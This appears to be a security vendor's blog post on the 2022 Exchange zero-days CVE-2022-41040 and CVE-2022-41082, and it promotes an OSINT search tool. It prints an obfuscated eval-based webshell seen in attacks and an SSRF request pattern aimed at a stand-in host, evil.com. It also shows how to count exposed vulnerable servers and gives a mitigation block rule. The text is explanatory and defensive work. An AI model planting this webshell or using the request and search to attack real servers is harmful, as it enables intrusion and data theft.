On September 30, 2022, Microsoft announced the results of the MS Exchange Zero Day vulnerability. This was due to the new vulnerabilities discovered in Microsoft Exchange Server 2013, Exchange Server 2016, and Exchange Server 2019.

This article discusses how to use the Security OSINT tools to find servers with these vulnerabilities, and cover a case study of an exploitable server. There were two vulnerabilities found in total:  CVE-2022-41082 and CVE-2022-41040. If a user has authenticated access rights to the Exchange Server that they want to attack, they can use both CVEs and launch a Remote Code Execution (RCE) attack at the server.

Outlook login screen of a service that uses an MS Exchange Server with vulnerabilities announced in MS Exchange Zero-day vulnerability
Outlook login screen of a service that uses an MS Exchange Server with vulnerabilities announced in MS Exchange Zero-day vulnerability

MS Exchange Zero-day Vulnerability Exploit Methods for Hackers

Hackers use the CVE-2022-41040 (with CVSSv3 score 8.8) vulnerability to heighten their authorization credentials with a Server-Side Request Forgery (SSRF) attack. Then, they use a CVE-2022-41040 (with CVSSv3 score 8.8) vulnerability with Remote Code Execution (RCE) and inflict damage on the Exchange Server. Afterwards, they use the malware apps they installed to leak the Active Directory and data. Hackers often target large and exposed Exchange Servers. They then send an HTTP request  ‘autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com’ through which they can bypass the MS-recommended Blocking Rule. Once the server becomes accessible, they execute the remote code on the exchange backend component.

Exploit process by hackers, used to exploit MS Zero-day vulnerabilities
Exploit process by hackers, used to exploit MS Zero-day vulnerabilities

Image Source : Microsoft Security, Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082

GTSC, a Vietnamese cybersecurity company, confirmed that the SSRF attack on CVE-2022-41040 verified that obfuscated Webshell (an uploadable web program vulnerability that can command the system) was requested on the Exchange server.This hacker used user-agent and accessed Antsword (Open-source cross-platform management tool based in China). The Webshell showed that hackers used Windows code page 936, a program that used simplified Chinese characters. This leads us to believe that the attack itself was carried out by a group of Chinese hackers. Another notable point can be found in the RedirSuiteServiceProxy.aspx file (the regular file available on the Exchange server). The contents of the file changed to code found in the Webshell file.

#Server Requested Webshell

<%@Page Language="Jscript"%>
 
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>

Detect Exploitable MS Exchange Servers using OSINT Tools

Users can identify Exchange Servers with MS Exchange Zero Day vulnerabilities using Criminal IP (https://www.criminalip.io). Use the cve_id filter and search for CVE-2022-41082 vulnerabilities. Searching for this vulnerability will yield a total of 91,807 IP address hosting vulnerable Exchange Servers.

Search Query : cve_id: CVE-2022-41082

Search results shown by searching for MS Exchange Zero-day vulnerability with CVEs

Port statistics show that most IP addresses with MS Exchange Zero-day vulnerabilities usually have both 80/443 ports exposed. Other open ports are often variations of %443, such as 8443, 4433 etc.

Results shown for MS Exchange Zero-day vulnerabilities by searching with vulnerable CVEs
Results shown for MS Exchange Zero-day vulnerabilities by searching with vulnerable CVEs

Furthermore, we can see that some IP addresses still operating in a vulnerable state due to weak certificates.

Server with MS Exchange vulnerability, hosted with a weak certificate
Server with MS Exchange vulnerability, hosted with a weak certificate

Most IP addresses found with Criminal IP have shown to have vulnerable port 80 and 443. The Inbound Score is also deemed critical, and this tags these IP addresses as malicious. As seen below, the IP address intelligence report states that there are a total of 89 vulnerabilities exposed, with issues other than CVE-2022-41082, CVE-2022-41040. Furthermore, this IP address is a Hosting IP, which means that if a hacker increases their authorization through CVE-2022-41040, they can penetrate the internal network and leak further data from the server.

Analysis results shown for IP address of a server with MS Exchange Zero-day vulnerability. A total of 89 vulnerabilities mapped
Analysis results shown for IP address of a server with MS Exchange Zero-day vulnerability. A total of 89 vulnerabilities mapped
Port and vulnerability information for IP address of a server with MS Zero-day vulnerability
Port and vulnerability information for IP address of a server with MS Zero-day vulnerability

Methods for Corporations on Taking Action against MS Exchange Zero-day vulnerability Exploits

MS recommends users to add *autodiscover\.json.*Powershell.* blocking rules to IIS Manager →  Default Web Site →  URL Rewrite →  Actions in order to block known hacker attack patterns, and recommend disabling remote PowerShell access. However, as with all zero-day vulnerabilities, it is very difficult to determine how these new vulnerabilities can affect the server. Usually, security personnel in corporations use vulnerability scanners to determine which vulnerability to take action on when these zero-day issues occur. However, it is difficult to scan all servers in operations, and it is also difficult to take quick action when an attack takes place.

Check out this analysis article about the Zero-day vulnerability exploits found in June 2022 on Atlassian’s Confluence server.


Source : Criminal IP (https://www.criminalip.io)